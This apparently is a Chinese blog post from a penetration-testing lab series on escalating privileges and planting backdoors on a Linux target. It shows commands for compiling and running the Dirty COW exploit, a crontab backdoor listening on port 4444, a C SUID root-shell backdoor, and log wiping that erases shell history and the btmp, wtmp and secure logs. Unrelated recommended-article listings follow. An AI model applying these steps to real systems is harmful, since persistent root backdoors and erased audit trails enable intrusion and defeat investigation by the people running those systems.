linux apache内网渗透,内网渗透 day8-linux提权和后门植入

最新推荐文章于 2024-05-14 11:09:12 发布
最新推荐文章于 2024-05-14 11:09:12 发布
阅读量297 收藏
点赞数
文章标签: linux apache内网渗透

linux提权和后门植入

1. 脏牛漏洞复现

(1) 去网页上把dirty.c中的代码复下来,制然后touch(创建)一个.c文件,vi或者vim打开将代码复制进去保存

(不能在kali上直接wget下载https://github.com/FireFart/dirtycow/blob/master/dirty.c,因为这样会把整个网页下载下来(亲测))

14ee4d3ce29169e8fef3bd76548fec07.png

14ee4d3ce29169e8fef3bd76548fec07.png

(2) 进入shell然后从kali开的apache服务上下载

879d02f59c1c6013840d28c15b73397e.png

(3) 编译1.c文件

879d02f59c1c6013840d28c15b73397e.pnggcc -pthread 1.c -o dirty -lcrypt                编译.c文件

(4) 执行文件

b114ee94464b5c605c6d5f35b4d9d4b3.png

b114ee94464b5c605c6d5f35b4d9d4b3.png./dirty | ./dirty 自定义密码

测试完记得将备份的password.bak(原)覆盖过去

(5) 切换改写过后的管理员账户(成功提权)

821356ad611e830867f7e0ce1a47530b.png

2. crontab计划任务

(1) vim /etc/crontab进入编辑(前提是有管理员权限)

3888b6fa9146bccbecfc19332bfe21da.png

(2) 重启后4444端口在运行

(3) 可以控制

3888b6fa9146bccbecfc19332bfe21da.png

3. suid提权(前提成功提权过一次,相当于留提权留后门)

(1) 创建一个suid.c的文件(由于靶机太难编辑了,所以我kali编辑完后用wget下载过去)

f0eb0294e3c1c2b9a4d3995daa88d84d.png

f49e0e70e599a1ab387dfee02fc0b8ce.png#include main(){setuid(0);system(“/bin/bash”);}

(2) 用wget下载suid

(3) gcc编译suid.c文件

a34e30b5f1f1e1e63adc4798b656b77b.pnggcc suid.c -o suid

(4) 修改suid的权限(将文件赋予执行该文件的以管理员身份执行改文件)

(5) 重启后的靶机可以直接执行./suid进行提权(不需要密码)

0c528c46936a632899f7d27377f2d417.png

4. linux痕迹清除

(1) 仅清理当前用户: history -c

0c528c46936a632899f7d27377f2d417.png

(2) 使系统不再保存命令记录:vi /etc/profile,找到HISTSIZE这个值,修改为0

c91bef758f3a49938e898b246c11d7b0.png

删除记录

(3) 删除登录失败记录:echo > /var/log/btmp

(4) 删除登录成功记录:echo > /var/log/wtmp (此时执行last命令就会发现没有记录)

fc1d3734bd9dff51cfaa1d52ba3a234f.png

(5) 删除日志记录:echo > /var/log/secure

清风明月人间
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
最新版linux apache-tomcat-10.0.0-M8.tar.gz
09-17
此最新版的“apache-tomcat-10.0.0-M8.tar.gz”是一个针对Linux平台的Apache Tomcat版本,具有改进的功能和修复的错误。 首先,让我们深入了解一下Apache Tomcat的核心概念。Java Servlet是Java编程语言中用于扩展...
apache-tomcat-7和8中含有win和linux版本
06-24
然而,Linux环境下的Tomcat,如`tomcat8-linux.zip`和`apache-tomcat-7.0.96-linux`,则提供了更高的稳定性和安全性。Linux系统以其高效和安全性著称,因此在生产环境中更常见。在Linux上部署Tomcat,通常需要通过...
linuxapache权限提升,LinuxApache服务 第三弹(权限控制)
weixin_42127775的博客
05-08 349
以上两边博客,介绍apache软件的一些基于不同的简单配置,这篇博客就简单的介绍一下网站的权限控制问题.还是拿第一篇博客的配置文件来举例子.现在我又两个网站一个是www.demo.com,一个是www.abc.com。现在我的测试两个网站都能够访问,现在要做的是让测试机不能访问www.demo.com却能够访问www.abc.com这边我的测试机的地址是192.168.220.132。知道IP地址...
系统渗透与防护——后门植入与SUID提权
m0_60643467的博客
10-09 1932
Msfvenom Msfvenom是MSF框架配套的攻击载荷生成器,可以用来生成木马程序,并在目标机上执行,在本地监听上线。 部分参数 -p:选择一个载荷 -f:生成的文件格式 -lhost:监听地址 -lport:监听端口 -o:输入文件名 -h:帮助 Msfvenom实验测试 Msfvenom生成后门文件 第一步,在kali生成后门文件 第二步,开启Linux靶机的root用户,并设置密码 上传后门文件至靶机 第三步,在kali中将后门文件发送到目标主机 在
linux各种姿势权限提升超超超细致教程
最新发布
qq_41245301的博客
05-14 1045
PATH 环境变量劫持提权,因为PATH环境变量是按照路径顺序执行命令,当黑客把恶意脚本改成你常用的命令并且,把路径改到最前面,那么久会发生环境变量劫持。重点关系统任务计划配置文件(/etc/crontab)的内容?检查root用户的任务计划?查看有没有错误的配置服务?查看配置文件是否包含有漏洞的插件?检查root用户的任务计划(普通用户是没有权限查看的)那些服务是开机运行的?查看当前目下可以读的文件。查看当前目下可以写的文件。查看cron目录中的内容。查看我们具有写入权限的脚本。查看socket的路径。
Apache2-XXE漏洞渗透
一纸荒芜的博客
07-04 4288
Apache2 Ubuntu Default Page XXE漏洞渗透
LINUX提权
RMC131的博客
04-19 1183
SUID是一种特殊的文件属性,它允许用户执行的文件以该文件的拥有者的身份运行。SUID是一对种二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属于程序属主的权限(仅对拥有执行权限的二进制文件有效。例如:所有用户都可以使用passwd命令来工更改自己的密码,而密码保存在中,普通用户是没有读写权限的,但只有root用户拥有读写权限,但在使用passwd命令时,加上SUID特殊权限位,就可以让普通用户临时获取读写该文件的权限。(个人理解和sudo一个道理)
linux 提升apache权限,Apache HTTP Server envvars本地权限提升漏洞
weixin_29006187的博客
04-29 193
发布日期:2012-09-13更新日期:2012-09-15受影响系统:Apache Group HTTP Server < 2.4.2描述:--------------------------------------------------------------------------------CVE ID: CVE-2012-0883Apache HTTP Server是Apache...
apache-tomcat8.5.51-windows和linux版本安全版本.zip
11-04
Apache Tomcat 8.5.51 是一个广泛使用的开源软件,它实现了Java Servlet和JavaServer Pages(JSP)规范,使开发者能够构建和部署动态Web应用程序。此版本的Tomcat针对Windows和Linux操作系统进行了优化,确保在这些...
最新版linux apache-tomcat-10.0.0-M7.tar.gz
08-26
在这个最新的Linux版本“apache-tomcat-10.0.0-M7.tar.gz”中,我们看到了Tomcat的第十个主要版本的预发布版。 Tomcat 10.0.0-M7是迈向10.0.0稳定版的一个中间里程碑,这个版本通常包含了新功能、性能改进以及bug...
apache-tomcat-8.5.98 linux安装包
01-31
这个版本是针对Linux操作系统设计的,允许开发者和系统管理员在Linux环境中部署和运行基于Java的Web应用程序。 **一、Apache Tomcat的介绍** Apache Tomcat是一个轻量级的应用服务器,主要用于执行Java Web应用。它...
apache版本号渗透
weixin_45441727的博客
02-25 461
apache版本号渗透 nikto -h 192.168.1.180 查看数据库版本号 select version (); 内核版本号 uname -r 数据库版本号 rpm -qa |grep php
Linux提权详解(一)
胖虎的博客
10-30 649
Linux提权方法和详解
权限提升:利用Linux漏洞提权
qq_68163788的博客
02-13 2296
Linux漏洞提权是指利用Linux系统中存在的漏洞,通过特定的方法来获取更高的权限。这种方法通常被黑客用来获取系统管理员权限,从而可以对系统进行更深入的攻击和控制。 一种常见的Linux漏洞提权方法是利用内核漏洞。内核是操作系统的核心部分,负责管理系统的资源和提供各种功能。如果内核中存在漏洞,黑客可以利用这些漏洞来提升权限。例如,通过利用内核中的缓冲区溢出漏洞,黑客可以在系统中执行恶意代码,并获取更高的权限。
linux提权总结
qk的专栏
05-12 1690
ernel, Operating System & Device Information: Command Result uname -a Print all available system information uname -r Kernel release uname -n System hostname hostname
渗透入门Day11 DNS与Apache
dhajajsja的博客
07-26 169
DNS与Apache相关内容
Apache HTTP Server 2.4.49 路径穿越漏洞(CVE-2021-41773)
weixin_47311099的博客
12-07 1962
Apache HTTP Server 2.4.49 路径穿越漏洞复现(CVE-2021-41773) Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响: 版本等于2.4.49 穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>。(默认情况下是不允许的) 攻击者利用这个漏洞,可以
kali 复现apache httpd多后缀解析漏洞
qfslyy的博客
01-06 236
1: 安装docker:并启动 下载vulhub 2:载入镜像: 登录确认: 3:写一个php文件,改后缀为多后缀。 4:单独上传php文件会被过滤,不允许商场php文件类型。 上传多后缀文件: 上传成功。 访问: 测试蚁剑连接: 连接成功。 ...
十二、权限提升
谢小二的博客
06-11 475
权限提升
Linux操作系统的环境下,利用命令配置Apache服务器
07-23
在使用Linux操作系统的环境下配置Apache服务器时,可以利用Vm虚拟机,在操作系统为Centos 7的情况下进行配置。在实验开始前,需要准备两个虚拟机,一个用来做主机,另一个用来做客户机。可以克隆一个虚拟机来作为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值